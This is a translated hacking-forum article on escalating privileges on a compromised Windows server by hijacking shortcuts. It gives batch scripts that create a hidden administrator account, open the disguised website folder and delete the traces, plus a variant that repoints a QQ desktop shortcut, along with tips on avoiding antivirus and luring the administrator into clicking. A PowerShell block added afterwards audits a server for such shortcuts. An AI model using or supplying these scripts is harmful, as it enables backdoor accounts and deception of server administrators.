Discuss this article with the author here: http://bbs.2cto.com/read.php?Tid=120978
Author: enterer
Blog: www.enterer.cn
Please retain this notice when reprinting.
I recently re-read an old hacker magazine and found that an earlier article on using shortcut hijacking to steal the final exam was very interesting. Because I recently updated the articles about server privilege escalation on my blog, I had an idea after reading it: why not use this method for privilege escalation on a server?
Create a temp.bat file:
@echo off
net user enterer 123456 /add & net localgroup administrators enterer /add
start c:\wwwroot
attrib "c:\wwwroot" -h -s
del c:\php\temp.bat
del c:\wwwroot.lnk
exit
When the shortcut is run, this adds an account, opens the website folder, removes the folder's hidden and system attributes, and finally deletes the batch file and the shortcut.
Here temp.bat runs from C:\php and the website folder it opens is the default one, c:\wwwroot. These can be modified according to the actual situation.
Right-click temp.bat and choose Create shortcut. Put the shortcut in the same folder as the website or in its parent folder. This method can be used when other attempts to escalate privileges have failed. You can put up a black page or send an email to the administrator. When the administrator logs on to the server and opens our shortcut (believing it is the website directory), the privilege escalation takes place.
This is only an idea; don't ask how to hide the website folder, how to remove the shortcut arrow, and so on. Because the shortcut flashes a CMD window, you could consider replacing the shortcut with an exe file (there will be no arrow, but the extension will show) and converting the bat to an exe or vbs so that the CMD window is invisible (tools such as bat2exe can do this).
Alternatively, if you have permission to modify the desktop shortcuts, the arrow is no longer a concern. Repoint the shortcut of a frequently used program, such as QQ, to a bat file that runs the privilege escalation commands and then starts QQ. For example:
@echo off
net user enterer 123456 /add & net localgroup administrators enterer /add
start c:\qq\qq.exe
exit
This is also a form of disguised bundling, and it is definitely "no-kill" (not flagged by antivirus). The commands can be used to add an account, open port 3389, or run the telnet service. How to induce the administrator to click remains the problem.
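From the defender's side, both placements described above (a shortcut beside or above the website folder, and a repointed desktop shortcut) can be audited. The following PowerShell is an added example, not part of the original article; the $Roots defaults, the extension and script-host lists, and the Test-Shortcut name are assumptions to adjust for the server being checked.

```powershell
# Added example (not the article's code): list shortcuts that launch scripts
# or that stand in for a hidden folder of the same name.
# $Roots is an assumption; point it at the web root's parent and the desktops in use.
param(
    [string[]]$Roots = @('C:\', "$env:PUBLIC\Desktop", "$env:USERPROFILE\Desktop")
)

$scriptExt   = '.bat', '.cmd', '.vbs', '.vbe', '.js', '.wsf', '.hta', '.ps1'
$scriptHosts = 'cmd.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe', 'powershell.exe'
$wsh = New-Object -ComObject WScript.Shell

function Test-Shortcut {
    param([System.IO.FileInfo]$Lnk)

    $sc      = $wsh.CreateShortcut($Lnk.FullName)   # opens the existing .lnk
    $target  = [string]$sc.TargetPath
    $reasons = @()

    if ($target) {
        $ext  = [IO.Path]::GetExtension($target).ToLowerInvariant()
        $leaf = [IO.Path]::GetFileName($target).ToLowerInvariant()
        if ($scriptExt -contains $ext)    { $reasons += "target is a $ext script" }
        if ($scriptHosts -contains $leaf) { $reasons += "target is script host $leaf" }
    }

    # The article's setup: wwwroot.lnk sits beside a hidden, system-flagged wwwroot folder.
    $twin = Join-Path $Lnk.DirectoryName $Lnk.BaseName
    if (Test-Path -LiteralPath $twin -PathType Container) {
        $dir = Get-Item -LiteralPath $twin -Force
        if ($dir.Attributes -band [IO.FileAttributes]::Hidden) {
            $reasons += "shadows hidden folder $twin"
        }
    }

    if ($reasons.Count -gt 0) {
        [pscustomobject]@{
            Shortcut  = $Lnk.FullName
            Target    = $target
            Arguments = $sc.Arguments
            Reasons   = $reasons -join '; '
        }
    }
}

foreach ($root in $Roots) {
    Get-ChildItem -LiteralPath $root -Filter *.lnk -File -Force -ErrorAction SilentlyContinue |
        ForEach-Object { Test-Shortcut $_ }
}
```

Any row it returns is a shortcut to review by hand; a legitimate desktop shortcut normally targets the program's own exe rather than a script.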
The article is wordy and may not suit everyone; I hope you can read it with patience. Although the chance of privilege escalation is relatively small, it is a way of thinking.